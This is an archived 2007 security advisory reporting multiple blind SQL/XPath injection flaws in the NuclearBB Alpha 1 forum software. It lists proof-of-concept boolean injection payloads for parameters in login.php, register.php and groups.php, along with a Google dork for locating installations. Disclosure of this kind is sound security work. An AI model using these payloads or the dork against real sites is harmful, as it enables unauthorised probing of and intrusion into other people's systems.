TUCoPS :: Web BBS :: etc :: tb10512.htm

NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities



NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities

Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"


============String Inputs
============
----------------------------
login.php - $_POST['submit']
----------------------------

username=xyz
password=passxyz
submit=Login"+and+"1"="0

--------------------------------
register.php - $_POST['website']
--------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register

----------------------------
register.php - $_POST['aol']
----------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com"+and+"1"="0 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register

----------------------------------
register.php - $_POST['signature']
----------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com"+and+"1"="0 
coppa_state=over
register_submit=Register

=============Numeric Inputs
=============
-----------------------
groups.php - $_GET['g']
-----------------------

http://www.example.com/groups.php?g=1+and+1=0 

------------------------------
register.php - $_POST['email']
------------------------------

username=xyz@xyz.com 
email=xyz@xyz.com+and+1=0 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over®ister_submit=Register


John Martinelli
john@martinelli.com 
http://john-martinelli.com 

April 18th, 2007

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH